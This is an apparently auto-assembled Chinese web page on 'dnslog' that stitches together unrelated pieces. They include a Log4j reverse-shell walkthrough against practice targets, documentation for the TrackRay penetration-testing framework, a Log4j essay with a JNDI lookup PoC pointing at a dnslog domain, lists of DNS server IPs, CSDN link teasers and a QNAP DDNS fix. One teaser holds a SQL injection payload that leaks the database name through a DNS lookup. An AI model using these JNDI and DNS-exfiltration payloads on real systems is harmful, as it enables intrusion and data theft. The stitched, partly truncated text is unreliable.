dnslog（dnslog回显）

本文目录一览：

• 1、Log4j反弹shell
• 2、打造自己的渗透测试框架—溯光
• 3、由log4j远程执行漏洞说起
• 4、greenplum6建临时表报错，请问是怎么回事？
• 5、39.98.57.158哪的服务器
• 6、解决跨网QNAP的ddns无法正常工作的问题

Log4j反弹shell

服务器到期的最后几个小时 先操作一波~

1:exp jar包 JNDI-Injection-Exploit

2:利用dnslog平台做初步验证

3:一台服务器作为反弹shell监听, 如果没有服务器可以去百度下NATappAPP、花生壳等做本机隐射

4:靶机平台百度搜一堆, 封神台、cftshow等

5:注意的坑:服务器端口需要开放, 服务器若是在阿里云、腾讯云直接装宝塔（作为一个PHP叼毛开发用宝塔是真香，商城中的各种环境，文件上传，开端口等~~~）

1: 先去dnslog获取一个地址,提交到cft练手(靶机)的平台,看是否存在Log4j日志漏洞

漏洞基于ldap协议 , 提交到靶场的平台。

提交后dns解析返回 ， 确定存在该漏洞。

1: 对bash -i 进行base64编码( )

2: 使用 JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar

3:利用ldap协议,生成的poc直接打

反弹shell:

打造自己的渗透测试框架—溯光

TrackRay简介

溯光，英文名“TrackRay”，意为逆光而行，追溯光源。同时致敬安全圈前辈开发的“溯雪”，“流光”。

溯光是一个开源的插件化渗透测试框架，框架自身实现了漏洞扫描功能，集成了知名安全工具：Metasploit、Nmap、Sqlmap、AWVS等。

溯光使用 Java 编写，SpringBoot 作为基础框架，JPA + HSQLDB嵌入式数据库做持久化，Maven 管理依赖，Jython 实现 Python 插件调用，quartz 做任务调度，freemarker + thymeleaf 做视图层，WebSocket 实现命令行式插件交互。

框架可扩展性高，支持 Java、Python、JSON 等方式编写插件，有“漏洞扫描插件”、“爬虫插件”、“MVC插件”、“内部插件”、“无交互插件”和“可交互插件” 等插件类型。

功能展示

主页

登录

任务创建

任务列表

任务详情

无交互接口插件调用

MVC插件示例

交互式插件控制台

MSF 控制台

依赖环境

JDK 1.8

Python 2.7

Maven

Git

Metasploit

Nmap(建议安装)

SQLMAP(建议安装)

AWVS

**加粗为必须环境，没有安装程序则无法正常编译运行

不论是 Windows 还是 linux 一定需要先安装 JDK1.8 和 Maven。安装过程这里不做演示。保证 JDK 和 Maven 都在系统环境变量，能执行java -version 和 mvn --version即可。

安装过程

第一步

手动启动 AWVS 服务

登录后台，生成一个API密匙。

复制密匙和 AWVS 的地址。

找到web/src/main/resources/application.properties配置文件。

修改如下部分

第二步

找到你 python 的第三方库目录。

Windows 的一般在 python 安装目录下的/Lib/site-packages

Linux 下可以通过输出 sys.path 来找第三方包路径

我的是 D:/Python2/Lib/site-packages

同样找到web/src/main/resources/application.properties配置文件。

修改python.package.path参数

第三步

安装 Maven 后找到仓库位置。

如果没有在 settings.xml 里配置指定仓库目录，默认会在当前用户目录中生成一个 .m2的目录

找到仓库目录后修改 application.properties 的 maven.repository.path参数

第四步

这个是 dnslog 回显检测漏洞时需要的。

去 ceye.io 注册一个账号，拿到给你分配的域名和 TOKEN。

修改配置文件

第五步

启动 msf 和 sqlmapapi。

如果你是 kali 操作系统，可以直接运行startdep.sh。

如果是其他系统，则要找到 metasploit 和 sqlmap 的目录分别执行

启动成功后修改配置文件

第六步

编译打包程序

等待依赖下载完成和编译完成，如果以上操作都没有出现问题则会提示 BUILD SUCCESS

编译成功后会在当前目录打包一个trackray.jar就是溯光的主程序。

然后直接执行startup.bat或startup.sh溯光就会启动服务。

没有抛出异常或ERROR日志，访问 8080 端口正常。

服务启动正常后，登录 iZone 社区账号。

**开发插件建议使用 Intellij IDEA IDE，需要安装 lombok 插件。

目录结构

插件

AbstractPlugin

这是交互式插件和非交互式插件的父类。

BASE常量

其中的静态常量 BASE 是 /resources/include/ 的所在目录。

如果你的插件需要额外的静态资源，那么你可以在 /resources/include 目录里创建一个和插件 KEY 相同的文件夹，便于识别，如果没有在 @Plugin 注解中设置 value 则默认的插件 KEY 就是当前类名首字母小写。

如 Typecho001 = typecho001

check(Map param)

这是用于检验是否合规的方法，需要被强制重写，当返回 true 时才会调用 start() 方法

param 参数是从前台传过来的参数键值对。

常被用于检验参数格式是否正确或漏洞是否存在。

after()

在 start() 方法之前调用

before()

在 start() 方法之后调用

start()

这是一个抽象方法，所有继承了该类的子类都需要重写这个方法。

在 check 方法 通过后会调用 start() 方法

start() 方法返回值最终会会当做插件结果，响应给前台。

shell()

调用当前系统 shell 来辅助完成插件功能。

executor()

插件执行的主方法

crawlerPage

http请求对象（不推荐使用）

fetcher

执行 http 请求对象（不推荐使用）

errormsg

当校验不通过时，返回给前台的信息。

param

前台传过来的参数键值对

requests

HTTP 发包工具（推荐使用）

hackKit

hack 常用工具包

无交互插件

无交互插件需要你填写好所有要填写的参数，直接请求接口来执行插件。

默认需要去继承 CommonPlugin类。

这是一个抽象类，继承了 AbstractPlugin

主要多出来两个属性：request 和 response。

继承了 CommonPlugin 的类可以通过调用这两个属性来控制请求和响应内容。

无交互插件同时也需要使用 @Rule 和 @Plugin 插件，这两个注解后面会讲到。

在 ，找到相应的插件填写好参数提交即可完成调用。

或直接调用接口。

交互式插件

交互式插件一般在命令行控制台中调用，可以允许你通过命令行交互来完成插件的调用。

交互式插件由 WebSocket 实现，想要写一个交互式插件，首先要继承 WebSocketPlugin 类。

同时设置 @Rule 注解的 WebSocket 参数为 true ，如果需要异步交互需要将 sync 也设置为 true。

内部插件

内部插件是不可以通过外部去调用的，需要继承 InnerPlugin 并使用 @Plugin 注解，通常在漏洞扫描时时会调用。

例如 “网页爬虫”，“指纹识别”，“端口扫描” 等，都是通过调用内部插件实现的。

还有用于检测 SSRF 等漏洞用的 FuckCeye 插件也属于内部插件。

通过 spring 的自动注入，来注入内部插件到当前对象。

例子可参考 WebLogicWLSRCE.java

爬虫插件

爬虫插件会在扫描任务被勾选“网页爬虫”时调用，每爬取一条请求就会调用一次爬虫插件。

爬虫插件需要继承 CrawlerPlugin，继承该类必须重写 check 和 process 方法。

check 方法用于检验请求是否符合插件规则，以免产生多余请求。

当 check 方法 返回为 true 时会调用 process 方法。

process 方法里写插件主要检测代码。

addVulnerable()

当插件检测出漏洞时，可以通过调用 addVulnerable() 方法来向数据库插入一条漏洞。

requests

requests 属性为请求工具包，处理 https 和 http 都很方便。

response

response 属性为当前爬虫得到的 HTTP 响应。

task

task 属性为当前任务对象，如果你的爬虫插件不是检测漏洞而希望是检测一些敏感信息的话可以修改 task.getResult() 里的属性。

参考 FingerProbe.java 或 InfoProbe.java。

target

爬虫爬取到的 URL 对象。

fetcher crawlerPage

http 请求对象（不建议使用）。

漏洞扫描插件

漏洞扫描插件会在，扫描任务中勾选“漏洞攻击模块”时调用。

漏洞扫描插件分为三种

1.独立插件

独立的漏洞扫描插件需要继承 AbstractExploit 并使用 @Plugin 或 @Exploit

AbstractExploit 中有以下需要了解的方法和属性。

requests

http / https 发包工具

target 当前扫描任务的地址。

task

当前扫描任务对象。

check()

check 是一个抽象方法，需要被子类强制重写。

该方法一般用于检验是否符合当前漏洞扫描插件的规则，以免产生多与请求。

attack()

attack 也是一个抽象方法，需要被子类强制重写。

该方法是检测漏洞的主方法。

before()

在 attack 方法前执行

after()

在 attack 方法后执行

addVulnerable()

当插件检测出漏洞时，可以通过调用 addVulnerable() 方法来向数据库插入一条漏洞。

fetcher crawlerPage

http 请求对象（不建议使用）。

2.漏洞规则

位于

实际上这是一个“内部插件”，会在勾选漏洞模块攻击时调用。

有一些漏洞检测方法很简单，只通过简单的判断响应体就能识别出来，也就没有必要再去写一个独立的插件而占用空间了。

在 doSwitch() 方法中会先去根据当前任务的指纹识别结果走一遍 switch 流程。

swtich 的每一个 case 都是 WEB 指纹的枚举对象。

当 switch 找到当前任务 WEB 指纹对应的 case 后，case 内的代码会通过构建一个漏洞规则添加到 loaders 集合里。

如果规则是通用的，可以写在 switch 的外面。

3.kunpeng JSON插件

kunpeng 是一个 go 语言编写的 poc 测试框架，这里我对 kunpeng 的 JSON 插件做了一个支持。

只需要按照 kunpeng json 插件的格式规范创建一个 json 文件到 /resources/json 目录。

在扫描任务勾选“漏洞攻击模块”时会被调用，或通过 MVC 插件调用 。

MVC 插件

位于

MVC 插件的特点在于，他可以像是在写一个功能一样，而非简单的接口式调用。

MVC 插件需要继承 MVCPlugin 类，并使用 @Rule,@Plugin 注解。

MVCPlugin 内置了一个 ModelAndView 对象， 是 SpringMVC 提供的。

可以通过 setViewName() 来指定视图层的网页模板。

通过 addObject(key,value) 向视图层网页模板注入参数。

这里的视图层是使用 thymeleaf 实现的，需要懂 thymeleaf 的语法。

例子可以参考：com.trackray.module.inner.JSONPlugin

继承 MVCPlugin 必须要重写一个 index 方法，这是插件的入口。

如果需要写其他的功能，就得再创建一个 public 返回值为 void 的无参方法。

并且要在该方法上使用 @Function 注解，该注解的 value 参数如果不填写的话则默认的 requestMapping 地址为方法名。

例如

最后还需要在 /module/src/main/resources/templates 创建一个目录名为插件 KEY 的目录。

里面存放扩展名为 .html 的模板文件。

Python 插件

python 插件有两种实现方式。

1.通过命令行实现

这种方式最为简单，通过在 include 里写一个 python 脚本。

然后在插件里调用 shell() 方法来执行系统命令。

案例可参考 com.trackray.module.plugin.Windows.smb.MS17010

但这样还需要再写 java 的代码，对于没有学过 java 的人来说很不友好。

2.通过jython实现

jython 是一个 Python 语言在 Java 中的完全实现。

我将它的调用过程写成了一个交互式插件。

你可以通过在 /resources/python/ 目录下安装如下规范去创建一个 python 文件。

在这个 python 文件中需要写两个方法。

关于注解

@Rule

一般用在“可交互插件”和“无交互插件”类上。

@Plugin

WEB指纹

这里顺便再说一下如何添加指纹库。

指纹库位于 base 模块，是一个枚举类。

可以在首部或尾部添加一条新的枚举，尽量使用 $ 开头。

第一个参数是 指纹的名称，如果第二个参数是 String 类型则是该指纹的说明。

FingerBean 类是指纹匹配对象。

由log4j远程执行漏洞说起

这几天让IT从业人员忙的不可开交的头等大事便是Log4j的远程执行漏洞了，我们先看一个简单的PoC：

先前往dnslog网站，申请一个子域名，假如是“subdomain.dnslog.cn”。

然后执行java Main ${jndi:ldap://subdomain.dnslog.cn/any}，我们在dnslog网站上刷新请求记录，便会看到申请的子域名被访问了。

如果你是一个开发者，你会知道我们的代码里面毫无疑问充斥着大量这种用法。如果你是一个安全人员，自然知道当恶意访问人员输入时可不只是访问个域名就完事，很有可能把主机密码就传到指定网站了。

那解决的办法在各大厂、安全公司等也已经公布了，无非以下几种：

WAF或防火墙规则，我们先不聊，这个大公司都会做，但并不能完全解除问题。

我们把升级JDK、升级logback、替换成logback以及移除log4j的JNDI相关类都可以看作类库升级。一方面，这些方案都需要一个应用一个应用去执行（甚至有些需要一个一个实例去处理），重复劳动，投入较大；另一方面，兼容性存疑，在升级前必然要做一定的回归测试。此处的兼容性，可以略举一些例子：比如代码里写死了log4j的实现类，而不是slf4j的api时，想要直接替换成logback就不现实。有人可能会说代码规范不允许，但他们忘了，规范和执行是2个相关的事情，但不是必然的因果关系。比如一些只做维护的老系统，存在时间比很多人工龄都长，还有一些是外包产商开发维护的系统，这种情况就是稳定重于一切。

其余几个都是修改配置，但其中略有差异。比如环境变量影响操作系统上所有的应用，如果某个应用JDK版本较高，又刚好需要这个特性，那么就容易产生bug了。修改PatternLayout容易遗漏，比如通常在自己应用的log4j配置文件，但也有可能内部框架做了封装，在jar包有配置，甚至在代码里做了配置。而在log4j2.component.properties添加配置同修改PatternLayout，也还是需要重新打包构建（除非有统一配置中心，并魔改log4j）。

综上来看，我们要避免开发人员修改、避免再次构建，只做重启的话，只能是修改环境变量或添加启动参数了。当然，每个公司有它自己的体系，某些时候大众意义的不好用对于它而言，反而是最简单的。比如，没有自动化（尤其是k8s）的公司，想要改启动参数，运维一个个实例去修改，那简直痛不欲生。

如果我们是log4j的开发人员，当产品经理提出一个需求，即碰到由“${”开头、“}”结尾的日志时，自动做替换，这个需求我们要不要做，怎么做。

刚入行的我是不会问要不要做的，只会想着怎么做，那自然是匹配、解析了。

有一定经验的我则会问这个需求为了解决什么问题，有没有比产品经理提的刚恰当的方式来解决（产品经理资历较浅，或者对产品不够熟悉时）。那我们可以看下log4j这个需求的提交记录最早可以追溯到2013年了，提交记录较多，可以通过代码反向推测需求：类似slf4j，将日志中的占位符替换成真实值，真实值可以延迟计算，计算来源支持扩展。

从代码看，目前已有的扩展包括ctx（日志事件的上下文）、date（日志事件产生的时间）、env（系统环境）、jndi（JNDI上下文获取）、map、sd（结构化事件类型中获取）、sys（系统属性）、web（从web.xml等取ServletContext）

需求是实现了，那还有吗？

如果是一个资深的研发人员就会问了，有预计的使用频率吗，如果使用频率非常高，性能就需要注意不能拖后腿；这个特性如果出现问题，需要关闭，最好能动态关闭；这个特性实际使用了多少次，耗时多少，报错多少；这个是否会在多线程环境下执行，这段代码是否线程安全；用户的输入能否对服务器产生破坏，保存后对其他用户是否产生安全问题。

在一个成熟的企业中，需要考虑诸如此类的问题。当然，很多东西可以模板化，减少开发人员心智，比如CI/CD实践中的自动化测试和DevSecOps。

为什么这次的影响这么大，因为它是基础库，比如dubbo、kafka、flink等很多框架和中间件都用到了它。同时，这从侧面说明log4j2是一个比较值得选取的日志库。

那回到技术选型，以日志为例，我们需要考虑哪些方面呢？

功能。功能是否契合企业需求，缺失功能是否在未来计划，或者扩展实现难度。如果功能都不满足，那自然pass。log4j、logback、log4j2都提供了将日志输出的功能，功能上都能满足，细节根据各企业自身情况而定了。

性能。性能自然是非常重要的，生产是没法debug的，只能通过日志来跟踪某一个事务的情况，如果日志耗时太多，TPS自然受影响，用户体验变差，还可能导致硬件成本上升。log4j2的性能就比logback要出色，logback比log4j要出色。

群众基础和易用性。如果没人会用，使用起来也困难，大概率很难被接受，也很难流行。文档是否介绍了架构设计，也有使用文档，文档是否支持多种语言（本土语言）。log4j2的配置就比较多，特别是想要较高性能时，配置更是复杂。

稳定性与活跃度。生产上使用，肯定要求稳，不可能三五天做一次修复升级。如果功能还未按计划完全实现，那么迭代升级过程中会碰到诸多问题，需要有较多的人提前使用反馈意见做改进，出现问题时，能够通过搜索引擎或其他社群解决。

开源协议。如果不开源，那么使用时心中便会有诸多不安，万一哪个地方有雷都不知道，出了问题，自己能解决的概率也极低。比如MySQL的双协议，要求要么交费，要么开源改动，不如Apache Licence等宽松，导致很多公司开始选择PostgreSQL。

生态。与企业的整套框架是否有冲突，开发流程上是否需要做额外的事情。比如很多框架用了log4j2，贸然引进logback，势必多出工作量来排除log4j2的依赖。比如开发流程工具只支持logback（当然这种场景基本没有），那么使用log4j2就需要再仔细想想了。

架构设计与代码质量。如果代码的架构设计较差，扩展性没设计好，那么企业内部做扩展（二次开发）时，只能修改代码，与源头分叉，后续几乎没法合并，无法反哺开源社区，企业内部后续升级也十分困难。如果代码质量太差，一步一坑，大家直接用脚投票的。

前瞻性。架构设计要有一定的前瞻性，以应对未来的变化。功能建设上也要有一定的前瞻性，实现、验证、上线三者之间还是需要一定时间的。比起等待，大部分人都是想我现在要。

greenplum6建临时表报错，请问是怎么回事？

你需要指定分区的时间间隔,来作为数据库创建分区的依据,命令如下: CREATE TABLE dnslog(userip varchar(20),request_domains varchar(255),datetime

39.98.57.158哪的服务器

港澳台dns服务器地址

香港：

205.252.144.228

208.151.69.65

202.181.202.140

202.181.224.2

澳门：

202.175.3.8

202.175.3.3

台湾：

168.95.192.1

168.95.1.1

国外dns服务器地址

美国：

208.67.222.222

208.67.220.220

165.87.13.129

165.87.201.244

205.171.3.65

205.171.2.65

198.41.0.4

198.41.0.4

198.32.64.12

192.33.4.12

192.203.230.10

192.5.5.241

192.112.36.4

192.36.148.17

192.58.128.30

192.9.9.3

193.0.14.129

128.9.0.107

128.8.10.90

66.33.206.206.

208.96.10.221

66.33.216.216

205.171.3.65

205.171.2.65

165.87.13.129

165.87.201.244

加拿大：

209.166.160.36

209.166.160.132

英国：

193.0.14.129

日本

202.12.27.33

202.216.228.18

韩国：

164.124.101.31

203.248.240.31

168.126.63.60

168.126.63.61

新西兰：

202.27.184.3

泰国：

209.166.160.132

202.44.8.34

202.44.8.2

印度：

202.138.103.100

202.138.96.2

国内各省市dns服务器地址

北京：

202.96.199.133

202.96.0.133

202.106.0.20

202.106.148.1

202.97.16.195

202.138.96.2

深圳：

202.96.134.133

202.96.154.15

广州：

61.144.56.100

61.144.56.101

广东：

202.96.128.86

202.96.128.143

上海：

202.96.199.132

202.96.199.133

202.96.209.5

202.96.209.133

天津：

202.99.96.68

202.99.104.68

广西：

202.96.128.68

202.103.224.68

202.103.225.68

河南：

202.102.227.68

202.102.245.12

202.102.224.68

河北：

202.99.160.68

福建：

202.101.98.54

202.101.98.55

厦门：

202.101.103.55

202.101.103.54

湖南：

202.103.0.68

202.103.96.68

202.103.96.112

湖北：

202.103.0.68

202.103.0.117

202.103.24.68

江苏：

202.102.15.162

202.102.29.3

202.102.13.141

202.102.24.35

浙江：

202.96.102.3

202.96.96.68

202.96.104.18

陕西：

202.100.13.11

202.100.4.16

202.100.4.15

202.100.0.68

山东：

202.102.154.3

202.102.152.3

202.102.128.68

202.102.134.68

山西：

202.99.192.68

202.99.198.6

四川：

202.98.96.68

61.139.2.69

重庆：

61.128.128.68

成都：

202.98.96.68

202.98.96.69

辽宁：

202.98.0.68

202.96.75.68

202.96.75.64

202.96.69.38

202.96.86.18

202.96.86.24

安徽：

202.102.192.68

202.102.199.68

10.89.64.5

吉林：

202.98.5.68

202.98.14.18

202.98.14.19

江西：

202.101.224.68

202.109.129.2

202.101.240.36

新疆：

61.128.97.74

61.128.97.73

贵州：

202.98.192.68

10.157.2.15

云南：

202.98.96.68

202.98.160.68

黑龙江：

202.97.229.133

202.97.224.68

219.150.32.132

海南：

202.100.192.68

202.100.199.8

宁夏：

202.100.0.68

202.100.96.68

甘肃：

202.100.72.13

内蒙古：

202.99.224.68

青海：

202.100.128.68

全球路由dns服务器

全球只有13台路由dns根服务器，在13台路由服务器中，名字分别为“A”至“M”，其中10台设置在美国，另外各有一台设置于英国、瑞典和日本。下表是这些机器的管理单位、设置地点及最新的IP地址。

名称管理单位及设置地点IP地址

A INTERNIC.NET（美国，弗吉尼亚州） 198.41.0.4

B 美国信息科学研究所（美国，加利弗尼亚州） 128.9.0.107

C PSINet公司（美国，弗吉尼亚州） 192.33.4.12

D 马里兰大学（美国马里兰州） 128.8.10.90

E 美国航空航天管理局[NASA]（美国加利弗尼亚州） 192.203.230.10

F 因特网软件联盟（美国加利弗尼亚州） 192.5.5.241

G 美国国防部网络信息中心（美国弗吉尼亚州） 192.112.36.4

H 美国陆军研究所（美国马里兰州） 128.63.2.53

I Autonomica公司（瑞典，斯德哥尔摩） 192.36.148.17

J VeriSign公司（美国，弗吉尼亚州） 192.58.128.30

K RIPE NCC（英国，伦敦） 193.0.14.129

L IANA （美国，弗吉尼亚州） 198.32.64.12

打开CSDN APP，看更多技术内容

【Swoole系列2.6】Redis 服务器_码农老张Zy的博客

服务端的意思是一个可以提供服务的应用,redis-server 才是我们最熟悉的那个 Redis 的服务端。 那么在Swoole中,这个 Redis 服务端是个什么东西呢?其实它是一个基于 Redis 协议的服务器程序,可以让我们使用 Redis 的客户端来连接这个服务...

继续访问

...内网服务器,同时内网用户实现通过公网地址访问内外那个服务器...

在实际应用中,路由器作为联网设备,wan口接运营商(唯一一个公网地址),内网口(作为网关)接内网,内部有一台服务器,面向所有用户。内网IP地址192.168.2.1(g0/0/2), 外网IP地址:219.146.84.42(g0/0/1),服务器ip192.168.2.12 (2).客...

继续访问

国内外dns大全

你还在为上网找不到dns而发愁吗？ 港澳台dns服务器地址 香港：205.252.144.228208.151.69.65202.181.202.140202.181.224.2 澳门：202.175.3.8202.175.3.3 台湾：168.95.192.1168.95.1.1 国外dns服务器地址 美国：　...

继续访问

免费公共dns服务器IP地址大全

国内常用公共dns 114 dns： （114.114.114.114；114.114.115.115） 114dns安全版（114.114.114.119；114.114.115.119） 114dns家庭版（114.114.114.110；114.114.115.110） 阿里 Alidns： （223.5.5.5；223.6.6.6） 百度 Baidudns（新增ipv6地址...

继续访问

网络显示服务器,服务器网络-什么是网络中所说的服务器

“床”就是保证你和老婆所有程序都能正常运行的服务器。 当然极个别情况除外 去网络手册中查即可知道答案! 服务器干什么用的 从广义上讲,服务器是指网络中能对其它机器提供某些服务的计算机系统(如果一个PC对外提供ftp服务,也可以叫服...

继续访问

rp魔兽那个服务器人最多,《魔兽世界》怀旧服RP服务器介绍 什么是...

在这里,有着绅士的圣骑士,阴冷孤僻的盗贼,粗狂豪迈的战士,平衡自然的德鲁伊。当然,这一切都不是必须的,因为在RP服务器中最重要的是你对角色的理解,以及你的扮演。即使是在阴暗处活动的盗贼也可以表现的像一个优雅的绅士,只要你能够自...

继续访问

网易dns劫持检测，dns被劫持检测方法有哪些？

1、遇到这种情况，首先是先看看其它人的电脑或手机等设备连接网络是否正常，是. 2、电脑重启后还不行，可以尝试将自己的dns地址固定为一些免费的、速度比较快的. dns(Domain Name System，域名系统)，因特网上作为域名和IP地址相互映射的一个分布式数据库，能够使用户更方便的访问互联网，而不用去记住能够被机器直接读取. 2、IIS7网站监控可以及时防控网站风险，快速准确监控网站是否遭到各种劫持攻击，网站在全国是否能正常打开（查看域名是否被墙），精准的dns污染检测，具备网站打开速度检测功能，第

继续访问

各地的ADSL MODEM VPI、VCI 和dns的信息

广西 0 35 dns 202.103.224.68 北京 0 35 dns 202.106.196.115 广东中山 0 35 dns : 202.96.128.68 湖南 0 35，dns：211.98.2.4 福建，0 200 ,dns:202.101.98.55和202.101.98.54 云南 0 35 dns:61.166.150.101 广东湛江 0 80 浙江杭州 8/35  0/

继续访问

web服务器基于那个协议,基于HTTP协议的web服务器项目_菜小倪的博客-CS...

基于HTTP 协议推动一个多线程服务器,客户端通过浏览器发送请求,服务器接收并分析客户端的请求方式和资源,从而执行相应的逻辑处理python s ixusr,最终将用户请求的资源以 HTML 页面的方式展现,并能进行差错处理。

继续访问

中国电信4g最快服务器IP,中国电信dns IP地址大全(32个省)_眺过云端的...

中国电信 广东省 东莞市dns 202.96.172.218 中国电信 广东省 东莞市dns 125.93.188.250 中国电信 广东省 东莞市dns 59.36.102.188 中国电信 广东省 东莞市dns 218.16.97.149 中国电信 广东省 东莞市dns 218.247.54.1 ...

继续访问

路由器显示dns服务器异常怎么办,手机显示dns异常解决方法(图文)

【导读】手机显示dns异常怎么办，下面就是191路由网整理的网络知识百科，来看看吧！大家好，我是191路由器网小编，上述问题将由我为大家讲解。手机显示dns异常的解决方法：1、让手机断开网络进行重新连接。2、重连网络仍然无法解决就考虑是路由器的问题，可以重启路由器进行解决，一般路由器的可能性比较大。3、如果还是无法解决就只能升级系统固件或者直接升级最新的系统，可能是由于旧版本的漏洞问题导致的手机D...

继续访问

12个国外免费dns服务

12个国外免费DNS服务

继续访问

无限火力那个服务器最久,lol无限火力上线仅一天各大区相继爆满最热门...

无限火力虽然好玩,但是同样出现了弊端,由于无限乱斗模式火热开启,为了保障玩家们的正常体验,已经限制了部分功能,如比赛记录,自定义模式,训练模式等,来降低服务器的负担! 而且在一同开启游戏的时候,会有一个短暂的等待时间,这段会提示目前...

继续访问

国内云服务器厂商该怎么选择?那个比较好?_有头发程序猿的博客-CSDN...

国内云服务器厂商还是很多的,排名前三的分别为阿里云,腾讯云和华为云。 阿里云起步最早,因此在用户数量和技术积累都是非常厉害的,主要在电商,支付,高并发方面有很大优势,典型的案例:淘宝,天猫,支付宝,12306等等。

继续访问

全球免费公共 DNS 解析服务器 IP 地址列表推荐 (解决无法上网/加速/防劫持)

全球免费公共 DNS 解析服务器 IP 地址列表推荐 基本上接触过网络相关知识的人应该多少都会听过DNS这个名词。因为 DNS 它非常重要，在我们上网的过程中扮演着重要的角色——“将网址/域名解析成 IP 地址”。 如果配置了不合理的dns服务器，可能会导致网速缓慢、打不开网站；一些恶意的 DNS 还会让你电脑出现弹窗广告、网站被劫持修改 (中间人攻击)、监听等等一系列的安...

继续访问

最新发布 Cisco AnyConnect 客户端 修改默认服务器地址

macOS vim /opt/cisco/anyconnect/profile/Profile.xml ?xml version="1.0" encoding="UTF-8"? AnyConnectProfile xmlns="" ServerList HostEntry User 用户名称 /User

继续访问

lol那个服务器有无限火力,lol无限火力2021最新开放时间汇总 英雄联盟...

最近英雄联盟美服测试服已经开启无限火力模式了,那么下面一起来看看国服无限火力2021大概什么时候开放吧。 1、美服测试服的无限火力在1.22日已经开启; 2、国服无限火力预计会在春节期间上线,等到二月初时,官方应该会透露一些消息;...

继续访问

服务器架构介绍_yayakfa的博客_什么是服务器架构

一个浏览器非常小,一般也就MB为单位。这是因为大部分工作都是服务器在做。前端页面,逻辑层,数据库,都需要放在服务器端。 浏览器的工作呢,其中包含了写前端界面中html,css,js等相应脚本语言的解释器。服务器端把前端页面的代码通过网络...

继续访问

2020 dns排名_2020年新版全球/全国各地ISP的dns服务器地址表

【第一】国内外知名的公共dns服务器(排列不分先后)：腾讯公共DNS(119.29.29.29、182.254.116.116)阿里公共DNS(223.5.5.5、223.6.6.6)百度公共DNS(180.76.76.76)360安全DNS(123.125.81.6)Google(8.8.8.8、8.8.4.4)114DNS(114.114.114.114、114.114.115.115)Ope...

继续访问

国外IP地址汇总

ip route 1.0.0.0 255.255.255.0 10.201.130.13  ip route 1.1.1.0 255.255.255.0 10.201.130.13  ip route 1.2.3.0 255.255.255.0 10.201.130.13  ip route 8.8.4.0 255.255.255.0 10.201.130.13  ip route 8.8.8.0...

继续访问

国内外知名公众dns服务器IP地址列表

当前国内外主流公众dns服务器列表 国内： CNNIC: 1.2.4.8,210.2.4.8+ AliDNS: 223.5.5.5,223.6.6.6 DNSPodPubliCDNS+: 119.29.29.29,182.254.116.116 BAIDUDNS: 180.76.76.76 114DNS: 11...

继续访问

国外ipv6服务器网站,国外 ipv6 服务器地址

国外 ipv6 服务器地址 内容精选换一换安全组创建后，您可以在安全组中设置出方向、入方向规则，这些规则会对安全组内部的云服务器出入方向网络流量进行访问控制，当云服务器加入该安全组后，即受到这些访问规则的保护。入方向：指从外部访问安全组规则下的弹性云服务器。出方向：指安全组规则下的弹性云服务器访问安全组外的实例。默认安全组规则请参见默认安全组和规则。常用的安全组规则配置示例请参见查询裸金属服务器私...

继续访问

热门推荐 国内外常用公共NTP网络时间同步服务器地址

Stratum-1在顶层，有外部UTC接入，而Stratum-2则从Stratum-1获取时间，Stratum-3从Stratum-2获取时间，以此类推，但Stratum层的总数限制在15以内。不同NTP服务器处理闰秒问题的方式可能不同，如果对时间同步精度存在需求，请关注你使用的NTP服务提供商的公告。NTP提供准确时间，首先要有准确的时间来源，这一时间应该是国际标准时间UTC。pool.NTP.org 是一个以时间服务器的大虚拟集群为上百万的客户端提供可靠的 易用的 网络时间协议（NTP）服务的项目。

继续访问

ip地址大全_2020全球公共 DNS 服务器 IP 地址大全

动动大拇指关注哦~全球公共 DNS 服务器 IP 地址大全部分往期回顾：【福利】2020开发者免费资源【福利】每日领取饿了么餐饮红包 截止日期2021年10月3124mail--临时邮箱、临时邮、临时电子邮箱、24小时邮箱国内芯片60个细分领域知名代表企业汇总资料详细说明【福利】2020钜惠流量卡，你值得拥有万兴PDF专家--一站式在线PDF解决方案【福利】企信通-...

继续访问

【DNS外带】

DNS_LOG外带 dnslog.cn （实际情况中你发现渗透的时候，有布尔型注入，但是很花时间，你有什么别的方法能够加快时间- 解决办法DNS_LOG外带） 普通DNS外带 select load_file(concat('\\\\',(select database()),'.tqfkcu.dnslog.cn/abc')) 通过16进制编码DNS外带 select load_file(concat('\\\\',(select substr..

继续访问

全国各地DNS地址详细列表

北京DNS地址： 202.96.199.133 、202.96.0.133 、202.106.0.20 、202.106.148.1、 202.97.16.195、 202.106.196.115 上海DNS地址： 202.96.199.132 、202.96.199.133 、202.96.209.5 、202.96.209.6 、202.96.209.133 天津DNS地址： 202.99.9...

继续访问

DNS配置外网

dnssec开启，部分dns请求为不信任链导致解析延迟或者解析失败（error显示为不信任）解决方法： vi /etc/named.conf dnssec-enable no; dnssec-valication no; 转载于:...

继续访问

175.6.172.218 是那个服务器

写评论

评论

收藏

解决跨网QNAP的ddns无法正常工作的问题

问题：你懂的跨网情况下，QNAP威联通外网服务器得到的访问ip不是路由器ip，因此ddns的映射ip有误，无法正常工作。

解决步骤：

1. 记录路由器dnsmasq查询日志

root@LEDE:~# vi /etc/dnsmasq.conf

加入：

root@LEDE:~# /etc/init.d/dnsmasq restart

2. 获取QNAP api服务器的ip

在QNAP myQNAPcloud云服务 My DDNS管理界面中刷新ddns，QNAP发送api查询请求，在/tmp/dnslog.txt 中记下访问的cname域名和所有ip

写此篇时的cname：core2.api.myqnapcloud.com

对应ip：18.210.138.207  34.196.214.117  34.230.144.114  52.200.64.231 54.152.194.22  54.209.14.111

2019.6.1对应ip变了：34.224.217.21 34.200.69.29 52.201.140.187 52.205.52.244 174.129.89.179 54.152.154.81

3. 白名单例外

把上述ip设置到白名单额外被忽略ip里

dnslog的介绍就聊到这里吧，感谢你花时间阅读本站内容，更多关于dnslog回显、dnslog的信息别忘了在本站进行查找喔。